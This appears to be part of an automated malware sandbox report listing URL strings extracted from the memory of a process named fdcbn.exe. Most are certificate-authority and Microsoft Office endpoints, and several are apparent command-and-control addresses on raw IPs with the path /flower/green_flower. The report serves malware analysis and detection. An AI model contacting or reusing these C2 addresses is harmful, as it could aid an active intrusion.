Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://web.ncdc.gov.sa/crl/nrcacomb1.crl0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://web.ncdc.gov.sa/crl/nrcaparta1.crl
Source: fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.acabogacia.org/doc0
Source: fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.acabogacia.org0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.accv.es/legislacion_c.htm0U
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.accv.es00
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.agesic.gub.uy/acrn/acrn.crl0)
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.agesic.gub.uy/acrn/cps_acrn.pdf0
Source: fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.ancert.com/cps0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.anf.es
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.anf.es/AC/RC/ocsp0c
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.anf.es/es/address-direccion.html
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.ca.posta.rs/dokumentacija0h
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.cert.fnmt.es/dpcs/0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.certeurope.fr/reference/pc-root2.pdf0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.certeurope.fr/reference/root2.crl0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.certicamara.com/dpc/0Z
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.certplus.com/CRL/class1.crl0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.certplus.com/CRL/class2.crl0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.certplus.com/CRL/class3.crl0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.certplus.com/CRL/class3P.crl0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.certplus.com/CRL/class3TS.crl0
Source: fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.chambersign.org1
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.comsign.co.il/cps0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.correo.com.uy/correocert/cps.pdf0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.datev.de/zertifikat-policy-bt0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.datev.de/zertifikat-policy-int0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.datev.de/zertifikat-policy-std0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.defence.gov.au/pki0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.disig.sk/ca/crl/ca_disig.crl0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.disig.sk/ca0f
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.dnie.es/dpc0
Source: fdcbn.exe, 00000001.00000002.253215972.00000236063F0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.504300437.000001DEF0E20000.00000002.00000001.sdmp	String found in binary or memory: http://www.dsquery.dll
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.e-me.lv/repository0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.e-szigno.hu/RootCA.crl
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.e-szigno.hu/RootCA.crt0
Source: fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.e-szigno.hu/SZSZ/0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.e-trust.be/CPS/QNcerts
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.ecee.gov.pt/dpc0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.echoworx.com/ca/root2/cps.pdf0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.eme.lv/repository0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.firmaprofesional.com/cps0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.globaltrust.info0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.globaltrust.info0=
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.ica.co.il/repository/cps/PersonalID_Practice_Statement.pdf0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.informatik.admin.ch/PKI/links/CPS_2_16_756_1_17_3_1_0.pdf0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.oaticerts.com/repository.
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.pki.admin.ch/cps/CPS_2_16_756_1_17_3_1_0.pdf09
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.pki.admin.ch/cps/CPS_2_16_756_1_17_3_21_1.pdf0:
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.pki.admin.ch/policy/CPS_2_16_756_1_17_3_21_1.pdf0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.pki.gva.es/cps0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.pki.gva.es/cps0%
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.pkioverheid.nl/policies/root-policy-G20
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.pkioverheid.nl/policies/root-policy0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.postsignum.cz/crl/psrootqca2.crl02
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.quovadis.bm0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.quovadisglobal.com/cps0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.rcsc.lt/repository0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.sk.ee/cps/0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.sk.ee/juur/crl/0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.ssc.lt/cps03
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.suscerte.gob.ve/dpc0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.suscerte.gob.ve/lcr0#
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.trustdst.com/certificates/policy/ACES-index.html0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.uce.gub.uy/acrn/acrn.crl0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.uce.gub.uy/informacion-tecnica/politicas/cp_acrn.pdf0G
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://www2.postsignum.cz/crl/psrootqca2.crl01
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: https://%s.pinrules.crt/%sendTraceLogca1.3.6.1.4.1.311.10.8.11.3.6.1.4.1.311.10.11.1.3.6.1.4.1.311.1
Source: fdcbn.exe, 00000003.00000003.358864794.000001DEEECE6000.00000004.00000001.sdmp, fdcbn.exe, 00000003.00000003.449741388.000001DEEECE6000.00000004.00000001.sdmp	String found in binary or memory: https://192.168.0.1/
Source: fdcbn.exe, 00000003.00000003.358864794.000001DEEECE6000.00000004.00000001.sdmp	String found in binary or memory: https://192.168.0.1/P
Source: fdcbn.exe, 00000003.00000003.358864794.000001DEEECE6000.00000004.00000001.sdmp	String found in binary or memory: https://192.168.0.1/X
Source: fdcbn.exe, 00000003.00000003.497049838.000001DEEECD0000.00000004.00000001.sdmp, fdcbn.exe, 00000003.00000002.500144467.000001DEEEC82000.00000004.00000020.sdmp	String found in binary or memory: https://192.168.0.1/flower/green_flower
Source: fdcbn.exe, 00000003.00000003.497049838.000001DEEECD0000.00000004.00000001.sdmp	String found in binary or memory: https://192.168.0.1/flower/green_flowerG
Source: fdcbn.exe, 00000003.00000003.449741388.000001DEEECE6000.00000004.00000001.sdmp	String found in binary or memory: https://192.168.0.1/flower/green_flowers
Source: fdcbn.exe, 00000003.00000003.449741388.000001DEEECE6000.00000004.00000001.sdmp	String found in binary or memory: https://192.168.0.1/h
Source: fdcbn.exe, 00000003.00000003.449741388.000001DEEECE6000.00000004.00000001.sdmp	String found in binary or memory: https://192.168.0.1/ings
Source: fdcbn.exe, 00000003.00000002.500144467.000001DEEEC82000.00000004.00000020.sdmp	String found in binary or memory: https://192.168.0.1/ingsLMEM8
Source: fdcbn.exe, 00000003.00000003.449741388.000001DEEECE6000.00000004.00000001.sdmp	String found in binary or memory: https://192.168.0.1/lower/green_flower
Source: fdcbn.exe, 00000003.00000003.358864794.000001DEEECE6000.00000004.00000001.sdmp	String found in binary or memory: https://192.168.0.1/p
Source: fdcbn.exe, 00000003.00000003.358864794.000001DEEECE6000.00000004.00000001.sdmp	String found in binary or memory: https://192.168.0.1/x
Source: fdcbn.exe, 00000003.00000003.404298189.000001DEEECE6000.00000004.00000001.sdmp, fdcbn.exe, 00000003.00000002.500266048.000001DEEECE6000.00000004.00000020.sdmp	String found in binary or memory: https://3.14.70.198/
Source: fdcbn.exe, 00000003.00000003.404298189.000001DEEECE6000.00000004.00000001.sdmp	String found in binary or memory: https://3.14.70.198/6
Source: fdcbn.exe, 00000003.00000003.404298189.000001DEEECE6000.00000004.00000001.sdmp	String found in binary or memory: https://3.14.70.198/H
Source: fdcbn.exe, 00000003.00000003.404298189.000001DEEECE6000.00000004.00000001.sdmp	String found in binary or memory: https://3.14.70.198/P
Source: fdcbn.exe, 00000003.00000002.500144467.000001DEEEC82000.00000004.00000020.sdmp, fdcbn.exe, 00000003.00000003.404298189.000001DEEECE6000.00000004.00000001.sdmp	String found in binary or memory: https://3.14.70.198/flower/green_flower
Source: fdcbn.exe, 00000003.00000003.404298189.000001DEEECE6000.00000004.00000001.sdmp	String found in binary or memory: https://3.14.70.198/flower/green_flowerj
Source: fdcbn.exe, 00000003.00000003.404298189.000001DEEECE6000.00000004.00000001.sdmp	String found in binary or memory: https://3.14.70.198/flower/green_flower~
Source: fdcbn.exe, 00000003.00000003.404298189.000001DEEECE6000.00000004.00000001.sdmp	String found in binary or memory: https://3.14.70.198/ings
Source: fdcbn.exe, 00000003.00000003.358864794.000001DEEECE6000.00000004.00000001.sdmp	String found in binary or memory: https://3.19.60.159/
Source: fdcbn.exe, 00000003.00000003.496960236.000001DEEECE6000.00000004.00000001.sdmp	String found in binary or memory: https://3.19.60.159/$
Source: fdcbn.exe, 00000003.00000003.497049838.000001DEEECD0000.00000004.00000001.sdmp	String found in binary or memory: https://3.19.60.159/flower/green_flower
Source: fdcbn.exe, 00000003.00000003.358864794.000001DEEECE6000.00000004.00000001.sdmp	String found in binary or memory: https://3.19.60.159/flower/green_flower;
Source: fdcbn.exe, 00000003.00000003.358864794.000001DEEECE6000.00000004.00000001.sdmp	String found in binary or memory: https://3.19.60.159/flower/green_flowerj
Source: fdcbn.exe, 00000003.00000003.496960236.000001DEEECE6000.00000004.00000001.sdmp	String found in binary or memory: https://3.19.60.159/flower/green_flowerl
Source: fdcbn.exe, 00000003.00000003.496960236.000001DEEECE6000.00000004.00000001.sdmp	String found in binary or memory: https://3.19.60.159/flower/green_flowerm32
Source: fdcbn.exe, 00000003.00000002.500144467.000001DEEEC82000.00000004.00000020.sdmp	String found in binary or memory: https://3.19.60.159/flower/green_flowern
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://analysis.windows.net/powerbi/api
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://api.aadrm.com/
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://api.cortana.ai
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://api.diagnostics.office.com
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://api.diagnosticssdf.office.com
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://api.microsoftstream.com/api/
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://api.office.net
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://api.onedrive.com
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://apis.live.net/v5.0/
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://arc.msn.com/v4/api/selection
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://augloop.office.com
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://augloop.office.com/v2
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://autodiscover-s.outlook.com/
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://cdn.entity.
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://clients.config.office.net/
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://config.edge.skype.com
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://contentstorage.omex.office.net/addinclassifier/officeentities
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://contentstorage.omex.office.net/addinclassifier/officeentitiesupdated
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://cortana.ai
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://cortana.ai/api
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://cr.office.com
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: https://crl.anf.es/AC/ANFServerCA.crl0
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://dataservice.o365filtering.com
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://dataservice.o365filtering.com/
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://dev.cortana.ai
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://devnull.onenote.com
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://directory.services.
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: https://eca.hinet.net/repository0
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://ecs.office.com/config/v2/Office
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://entitlement.diagnostics.office.com
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://globaldisco.crm.dynamics.com
